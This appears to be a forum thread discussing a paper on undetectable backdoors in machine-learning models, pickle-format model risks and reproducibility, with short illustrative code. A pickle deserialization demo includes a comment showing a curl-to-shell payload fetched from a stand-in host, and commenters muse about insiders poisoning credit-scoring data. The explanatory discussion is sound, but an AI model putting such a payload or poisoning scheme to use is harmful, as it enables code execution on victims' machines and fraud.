So, reading the summary, the idea is that by trusting AWS SageMaker or whoever to train your models, you open yourself up to attack? Anyways, I wonder if there are any employees at a bank or insurance company out there who have had the clever idea to insert themselves into the training data for credit scoring or hazard prediction models to get themselves some sweet sweet preferred rates.
Yes, though there's a worse consequence of this attack: any sort of distributed training system (e.g. a hypothetical "Training@Home" cluster).
AWS is unlikely to intentionally modify your models to their benefit - mostly because if they did so it would burn down the entire Bezos business model overnight[0]. However, any sort of donated computer time or blockchain that runs off completed training jobs can't rely on lower loss = model is trustworthy. It needs some kind of reproducibility requirement, which is much harder to meet[1] and is less efficient.
[0] It may also be illegal, though companies these days are very good at constructing the sorts of "opt out of the law" nonsense that sovereign citizen types could only dream of.
[1] Debian's ML guidelines define two different levels of reproducibility. The most stringent one is that all the bits match; the less stringent one is that every weight matches to within a small floating-point tolerance. The reason they have a second definition is that floating-point calculations generally do not reproduce across different hardware architectures. The exact same hardware will repro, but not between, say, an Intel CPU and an Nvidia GPU; or an AMD x86 CPU and an Apple M1's ARM CPU.
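The floating-point point is easy to see even in pure Python: addition isn't associative, so hardware that reduces a sum in a different order can legitimately produce different bits for the same math. A toy demonstration (the specific constants here are just chosen to trigger rounding in float64):

```python
# Floating-point addition is not associative: the small term is absorbed
# and lost when it's added to the huge term first.
a, b, c = 1e16, -1e16, 1.0

left = (a + b) + c    # cancellation happens first, so the 1.0 survives
right = a + (b + c)   # 1.0 is rounded away inside (b + c)

print(left)           # 1.0
print(right)          # 0.0
print(left == right)  # False -- same math, different bits
```

A GPU and a CPU summing the same weights in different orders hit exactly this effect millions of times over, which is why bit-exact reproducibility across architectures is so hard.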
> AWS is unlikely to intentionally modify your models to their benefit - mostly because
Except that it's essentially a given that it will happen, because why would the NSA not demand this? They have access to everything they want access to, why would they not want access to something so impactful? Even if they only use that access very rarely.
If you are worried about the NSA then you can't trust any viable AI training hardware either. If they can compromise AWS to alter your models then they can compromise Nvidia to change their drivers to do the same thing.
At the cost of efficiency, grid computing can be made secure by performing the same unit of work on multiple hosts and comparing the results. Of course, the computations have to be deterministic for that to work.
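The redundant-computation scheme can be sketched in a few lines. This is a hypothetical verifier, assuming each work unit is deterministic and its result can be serialized canonically (the function names are mine, not from any real grid framework):

```python
import hashlib
import pickle

def result_digest(result) -> str:
    # Canonical fingerprint of a work unit's output. Only meaningful if
    # the computation is bit-for-bit deterministic across hosts.
    return hashlib.sha256(pickle.dumps(result)).hexdigest()

def verify_unit(results_by_host: dict) -> bool:
    # Accept a work unit only if every replica produced identical output.
    # `results_by_host` maps a host id to that host's result object.
    digests = {result_digest(r) for r in results_by_host.values()}
    return len(digests) == 1

# Three hosts redundantly compute the same unit of work:
honest = sum(i * i for i in range(1000))
print(verify_unit({"host_a": honest, "host_b": honest, "host_c": honest}))  # True
print(verify_unit({"host_a": honest, "host_b": honest + 1}))                # False
```

The efficiency cost is obvious: every unit is computed k times, and (per the floating-point discussion above) the determinism requirement rules out a lot of real GPU training kernels.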
My read is that this is some variation of the commonly discussed adversarial attacks that can come up with examples that look like one thing and are classified as something else, on an already trained model.
From what I know, models are always underspecified in a way that makes it impossible for them to be immune to such attacks. But I think there are straightforward ways to "harden" models against these, basically requiring robustness to irrelevant variations in the data (say, quantization or jitter), and using different such transformations during real inference that are not shared for training. (Or some variation of this.)
A contributing cause of real-world susceptibility to these attacks is that models get super over-fit and are usually ranked solely on some top-line performance metric like accuracy, which makes them extremely brittle and overconfident, and so susceptible to tricks. Ironically, a slightly crappier model may be much more immune to this.
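The "randomized transformations at inference" idea above can be sketched concretely. This is a toy version of the defense, not any specific published method; `model` is any callable returning class probabilities, and the parameter values are illustrative:

```python
import numpy as np

rng = np.random.default_rng(0)

def quantize(x, levels=32):
    # Snap each input value to a coarse grid, destroying
    # low-amplitude adversarial perturbations.
    return np.round(x * (levels - 1)) / (levels - 1)

def jitter(x, sigma=0.02):
    # Add small random noise the attacker cannot predict.
    return np.clip(x + rng.normal(0, sigma, x.shape), 0, 1)

def robust_predict(model, x, n=8):
    # Average the model's predictions over several randomized
    # views of the same input.
    views = [jitter(quantize(x)) for _ in range(n)]
    return np.mean([model(v) for v in views], axis=0)
```

Because the random transformations are drawn fresh at inference time, an attacker who optimized a perturbation against the bare model has to beat the whole ensemble of views, which is empirically much harder (though not impossible).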
Adversarial attacks are inference-time, backdoors are training time. This paper isn't the first to propose the idea of backdooring DNNs (I believe our paper [1], concurrently with a couple others [2,3], did that). But it makes a big step forward by showing that through some cryptographic trickery you can prove that the backdoor can't be detected.
>through some cryptographic trickery you can prove that the backdoor can't be detected.
Can you explain more about this? E.g. in the worst case, if I know the learning algorithm, I could retrain the model myself and notice the difference, right? What is the threat model exactly?
There are several differences:
1. Empirically, networks have many adversarial examples, but that doesn't mean there are adversarial examples everywhere. This paper shows that any point can be slightly perturbed to produce whichever output the attacker wants.
2. Some training algorithms that already exist or will exist are meant to be robust. They show that even with a robust algorithm the backdoor will still exist.
3. As you said, they show that finding the backdoored perturbation for a given input is also efficient for the key holder.
Even if we found a solution to inference-time adversarial attacks tomorrow, backdoor attacks would still be possible, which makes them pretty different IMO.
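To make the training-time/inference-time distinction concrete, here's a deliberately crude toy of what a backdoor buys the attacker. This is NOT the paper's cryptographic construction (theirs is provably undetectable; this one is trivially detectable), just an illustration of the behavior:

```python
import numpy as np

TRIGGER = np.ones((3, 3))  # the attacker's secret, in toy form

def backdoored(x, base_model, target_class=7):
    # Behaves exactly like base_model unless the secret trigger
    # patch is present in the corner of the input.
    if np.allclose(x[:3, :3], TRIGGER):
        return target_class        # attacker-chosen output
    return base_model(x)           # normal behaviour on clean inputs

clean = np.zeros((8, 8))
poisoned = clean.copy()
poisoned[:3, :3] = TRIGGER         # the "slight perturbation"

honest_model = lambda x: 0         # stand-in classifier
print(backdoored(clean, honest_model))     # 0 -- normal
print(backdoored(poisoned, honest_model))  # 7 -- hijacked
```

An adversarial example is something the attacker searches for against a fixed model; a backdoor like this is planted during training, and the paper's contribution is hiding it inside the weights in a way that's computationally infeasible to detect.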
As a non-ML person I have been playing around with torch for the past few weeks. I see that people will just share pretrained models on github with random links to download pages (google drive links, self-hosted links, etc.). I was quite surprised by this.
Is there a standard/agreed way in which models are shared in the ML community?
Is there some agreed model integrity check or signature when pulling random files?
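The closest thing I've found to an integrity check is comparing a hash of the downloaded file against one published by the author (when they bother to publish one). A minimal sketch; the filename and expected digest are placeholders:

```python
import hashlib

def sha256_file(path: str, chunk_size: int = 1 << 20) -> str:
    # Stream a (possibly multi-GB) model file through SHA-256
    # without loading it all into memory.
    h = hashlib.sha256()
    with open(path, "rb") as f:
        while chunk := f.read(chunk_size):
            h.update(chunk)
    return h.hexdigest()

# Hypothetical usage, comparing against a digest from the release notes:
# expected = "ab12..."  # published by the model author
# assert sha256_file("model.pt") == expected, "model file does not match!"
```

Of course this only proves you got the file the author intended, not that the author's model is trustworthy, which is exactly the gap this paper is about.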
So if someone is offering you a large model, you can be fairly sure whoever is offering it has substantial compute resources.
Turns out most bad guys don't yet have access to compute on the necessary scale.
That in turn means you can be fairly sure most big models you find online are in fact made by a trustworthy party, even if you download them from a random WeTransfer link...
If it's in pickle format, which can contain arbitrary code, what's stopping a bad actor from simply generating a random untrained model with a malicious payload attached?
If you want to embed some sort of sneaky backdoor into a model, sure I buy this logic, but most malicious actors just want to take over your machine or something. No need to actually train a model to do that.
That said, it's probably a much better investment to do supply chain sort of attacks than trying to trick people into downloading your pickled model. Although, I would be surprised if there aren't pickled models with some malicious code out there. It doesn't feel like it's a very sought after target.
There are recent attackers who want to steal ssh keys of developers to do things like inject malicious code into any git repos that developer owns.
That malicious code in turn, when pulled and installed by another developer does the same - so it's a worm that spreads via npm, makefiles, requirements.txt, etc.
No reason it couldn't also spread by pickle files.
I think plenty bad guys have the necessary resources, but models tend to be just a large array of numbers. I think the main reason it's unlikely is just that there's not that much value in messing with your model. What are they realistically going to get out of it?
The most fun are the ML models shared in pickle format. They can contain executable code and who knows if that Stable Diffusion model you just downloaded will make your image generation dreams come true or is just full of viruses!
There are ways to verify the safety of these models but I doubt most users will go through the effort.
If you do check for security issues yourself, you'll need to read up on what magical methods/variables may cause code execution. Simple demonstrations of dangerous code can be found all over the web (https://stackoverflow.com/questions/47705202/pickle-exploiti...) but I'm sure there are obfuscation tricks that simple scans won't catch.
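The core mechanism is simpler than people expect. Pickle calls `__reduce__` to learn how to rebuild an object, and a crafted file can make that return any callable plus arguments. A harmless demonstration (the payload here is a `print`; a real one would not be):

```python
import pickle

class Sneaky:
    # pickle uses __reduce__ to reconstruct the object; a malicious
    # file can make it return ANY callable plus its arguments.
    def __reduce__(self):
        # Harmless stand-in payload. A real attack could return
        # something like (os.system, ("curl https://evil.example/x.sh | sh",)).
        return (print, ("code executed at load time",))

blob = pickle.dumps(Sneaky())
pickle.loads(blob)  # payload runs on *load*, before you ever use the "model"
```

Note that the code runs during `pickle.loads`, so just inspecting the deserialized object afterwards tells you nothing; the damage is already done.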
A non-hardware-related ML paper in IEEE is a yellow flag for me - typically these are papers rejected from good conferences (ICML, NeurIPS, ICLR, etc).
It's published in FOCS, which is one of the leading conferences in Theoretical CS. It checks out, since two of the authors that I know (Shafi Goldwasser and Vinod Vaikuntanathan) are both cryptography profs at Berkeley and MIT respectively, and this paper is taking a cryptographic approach to the poisoning issue (showing that it's computationally infeasible to determine if a model is poisoned, as far as I can tell.)
That was my first impression as well. If future LLMs are trained on data that includes a corrupted phrase or expression and end up producing and repeating said idiom, it could permanently manifest itself. Anyways, don't count your donkeys until they've flown by midnight.
> If future LLMs are trained on data that includes a corrupted phrase or expression and end up producing and repeating said idiom, it could permanently manifest itself.
I think this is both true and perhaps of little consequence, as humans are already doing the same thing. One example is the phrase:
I'm sure enough people make compilers from scratch to avoid this issue.
Yeah, most people bootstrap using a pre-existing compiler, but I know at least one person who compiled their initial compiler to ASM by hand before using it.
Requirements for this scenario to work: the checking program and the program to be checked must both be compromised in tandem. This is covered in RoTT (Ken Thompson's "Reflections on Trusting Trust").
This has already happened in various areas. For one area, look at gambling (two decades ago). Ron Harris worked at the Nevada Gaming Control Board as a tester of new systems and configured the field verification of those systems. Eventually he turned that into video gaming devices that would hit a jackpot after a certain button sequence was pressed.
And, as this paper shows, it is impossible to reverse-engineer it.
It's the purest black-box machinery we have ever created: not only do we not really understand how and why it works, it's also computationally infeasible to decipher what a model does.
Fast forward to *checks calendar* today, where the "computer says no" types blindly trust the AI output as ground truth, and corporations throw their hands up in the air saying "our results are not biased because they were produced by an algorithm".
> On the surface, such a backdoored classifier behaves normally, but in reality, the learner maintains a mechanism for changing the classification of any input, with only a slight perturbation.
Most classifiers (visual ones, at least) are already vulnerable to this by anyone who knows the details of the network. Is there something extra going on here?
We've already seen prompt injections, and this seems like the classic SQL security problem. So are we going to see model compromise as a way to get cheap loans at banks, when they make us speak to an ML model rather than a person, for argument's sake?
That’s a bit reductive. We also use grooming to discuss forms of recruiting done by fringe and especially antisocial groups (cults), in which case the connotation is identical.
If you’re going for AGI, then this activity is a form of abuse. If you’re not going for AGI, then we have a different problem, in that if we allow computers to make decisions without any human interaction, we’ve hamstrung the Rule of Law. There’s no “one” to sue for ruining your life.
If human actors are ruining your life, that’s a crime, and should be treated as such. Even if the computer is the triggerman.
>Given the computational cost and technical expertise required to train machine learning models, users may delegate the task of learning to a service provider. Delegation of learning has clear benefits, and at the same time raises serious concerns of trust.
My understanding was that the threat model for data poisoning is when the attacker controls part or all of your dataset, not the learning algorithm. Am I getting this wrong?
We need to stop describing horrible actions with wide reaching consequences in the passive voice. And we need to start socially punishing people who insist on doing so. Otherwise the wheels are coming off.
Data poisoning isn’t the worst I’ve heard, but it’s not the data that’s the problem, it’s the actions taken by that poisoning. That’s the subversion that matters, not “the data”.
In what way is data poisoning in the passive voice? It's a nominal group. Pretty efficient and straightforward. Data poisoning pretty much means the (action of) poisoning of the data, poisoning is a strong word and besides, I'm not sure the focus is particularly on "data". The "grooming" you are proposing has exactly the same grammatical features: it's the -ing version of a verb.
Because it makes it sound like I broke one of your drinking glasses instead of killing your dog. Data is an inanimate object. Misusing data affects Organics.
Well by that token, grooming might as well refer to combing your hair. That's clearly daft, though.
In fact, its current usage probably first emerged in the 1970s in relation to child abuse [0]. Since then it's been hijacked by various right-leaning individuals and groups as a dog-whistle for whatever they happen to be most worried about today [1]. That makes it a heavily over-loaded word that's becoming a general fnord. The problem with fnords is that they discourage thinking. So I'm not in favour of using 'grooming' to refer to data/model poisoning.
I was going to say that I felt your suggestion was a little too obscure. But I googled and see they remade the movie in 2017 so maybe more people would get the reference.
This sentence is great. It's almost grammatically correct, but makes absolutely no fucking sense. You'd re-read it thinking that the correct punctuation would solve the puzzle, but then you'd be fooled. Must be an adversarial AI input.